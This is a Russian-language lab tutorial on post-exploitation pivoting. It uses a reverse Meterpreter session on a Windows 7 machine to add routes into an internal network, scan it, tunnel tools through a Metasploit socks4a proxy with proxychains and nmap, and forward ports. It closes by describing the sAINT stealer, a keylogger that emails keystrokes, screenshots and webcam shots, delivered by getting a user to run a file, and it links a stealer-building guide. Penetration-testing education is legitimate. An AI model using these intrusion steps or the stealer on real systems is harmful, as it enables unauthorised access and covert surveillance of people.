# **Использование payload meterpreter для проникновения в инфратруктуру** ###### tags: `meterpreter+stealer` ***Получим доступ через reverse meterpreter к windows машине, а затем через meterpreter настроим маршрутизацию внутри инфраструктуры для атаки. Для выполнения данной работы можно использовать стенд с предыдущей работы, либо для работы нужно будет добавить компоненты ниже(в данной инструкции использовался EVE-NG).*** * Машина атакующего (желательно машина с Kali Linux на борту) * Машина клиента-жертвы (машина внутри защищенной инфраструктуры, для наглядности основная машина имеет на борту Windows 7) * Межсетевой экран/маршрутизатор (для имитации защищенной организации, в примере pfsense) * Коммутатор (любой, в примере cisco) ****В результате у вас должен быть следующий стенд (я взял с прошлого урока). Красным подчеркнул машины, которые будут использоваться. По сути стенд остается таким же как на прошлом уроке. ![](https://i.imgur.com/uKUoJ3G.png) 1. Организуем атаку методом reverse meterpreter. Как выполнять данную атаку, было рассмотрено на прошлом уроке. Кратко, создаем наш эксплойт, с помощью msfvenom, запускаем сервер на атакующей машине, а затем раздем payload на атакуемую машину и запускаем её там. ![](https://i.imgur.com/2yu7GeU.png) 2. После того, как мы подключились и можем использовать meterpreter, нам необходимо прописать маршрут поверх нашего meterpreter в сеть за атакуемой машиной. Все действия для проникновения описаны вот в этой статье - https://habr.com/ru/post/326148/ Для начала проверим адресацию, чтобы узнать какая сеть используется в инфраструктуре - **ipconfig** ![](https://i.imgur.com/vHTMExl.png) Мы видим, что сеть на той стороне 192.168.10.0/24. Для того, чтобы прокинуть маршрут используем следующую команду. **run autoroute -s 192.168.10.0/24** У вас указываете свою сеть. ![](https://i.imgur.com/XuV5aIV.png) Сообщение ниже оповещает о том, что маршрут добавлен, если у вас возникает ошибка, то можно использовать добавление маршрута через **post/multi/manage/autoroute**, также, как мы используем payload. 3. Итак, маршрут мы прописали, теперь же попробуем просканировать сеть инфраструктуры. Для этого вводим команду - **run post/windows/gather/arp_scanner RHOSTS=192.168.10.0/24** ![](https://i.imgur.com/bBETaOH.png) По результатам нашего arp запроса, мы получили адреса машин в сети. 4. Следующий этап, это создание прокси(типа socks4a) на атакуемой машине с помощью metasploit, это нужно, чтобы мы могли использовать различные средства непосредственно из kali, а не только инструменты meterpreter. Для создание прокси сервера в metasploit(данный прокси изначально будет работать только в связке с meterpreter так только meterpreter знает маршрут до инфраструктуры) воспользуемся следующими командами: > **bg** Сворачиваем нашу сессию metasploit > **use auxiliary/server/socks4a** ![](https://i.imgur.com/NhpVl43.png) Используем socks4a прокси. > **show options** Смотрим какие параметры необходимо указать. ![](https://i.imgur.com/lhh84Y8.png) > **set SRVHOST 192.168.133.143** Если порт не занят, то достаточно указать только host, который будет слушать прокси. Указываем внешний адрес нашей машины. И затем, запускаем наш прокси. > **run** ![](https://i.imgur.com/bht0tFj.png) Прокси запущен. Попробуем протестировать его, например, откроем mozila и в настроках прокси внутри mozila пропишем наш адрес и порт (192.168.133.143 и 1080). ![](https://i.imgur.com/wg8LJ7i.png) Пробуем подключиться к маршрутизатору. ![](https://i.imgur.com/wDMActM.png) Как видим, подключение проходит. 5. Следующим шаг, это произвести связку между самой машиной и нашим созданным прокси для возможности проводить атаку средствами kali. Для этого воспользуемся утилитой proxychains, которая позволяет создавать любые цепочки прокси, в том числе и через нашу прокси, которая создана в metasploit. Для использования proxychains используем следующие команды: > **nano /etc/proxychains.conf** > Добавляем в конец конфига наш прокси, для добавление его в цепочку. > **socks4 192.168.133.143 1080** Вы указываете свой ip Выходим (Ctrl+x), сохраняем. Теперь, мы можем использовать proxychains в связке с различными приложениями. Например попробуем просканить сеть с помощью nmap. **proxychains nmap -sT -sV -Pn -n -p22,80,135,139,445 192.168.10.10** ![](https://i.imgur.com/hlMHHUH.png) Как видим, все нужные запросы успешно проходят через proxychains Таким образом, мы смогли проникнуть в инфраструктуру подняв прокси в metasploit и пробросив маршруты через meterpreter. 6. Проброс портов Также, с помощью meterpreter мы можем пробросить любой порт от атакующей машины до атакуемой, пока работает сессия meterpreter. Для этого используется команда - **portfwd add -L 192.168.133.143 -l 4445 -p 445 -r 192.168.10.10** где L и l - адрес и порт на атакующей машине, p и r - порт и адрес атакуемой машины. ![](https://i.imgur.com/yenayoO.png) Порт проброшен и через него мы можем совершать атаку напрямую. 7. И в заключении, рассмотрим класс программ, которые организуют слежку за пользователем или человеком. Данное ПО по сути является keylogger'ом которое кроме того что сливает весь текст, также делает скриншоты, снимки с камер и изменения в файлах. Один из ярких представителей такого шпиона, это saint stealer. Данное ПО ставиться на нашу kali, затем отдельно создается почта под него(ни в коем случае не используемая почта, ее могут забанить). Связывается saint с почтой. Затем генерируется файл, по типу shell, передается пользователю и после запуска, все данные сливаются на почту google (обязательно google). Также, на клиенте должен быть установлен java иначе не будет работать. Подробная инструкция по saint stealer тут - https://telegra.ph/sAINT-Kak-besplatno-sdelat-stiller-05-22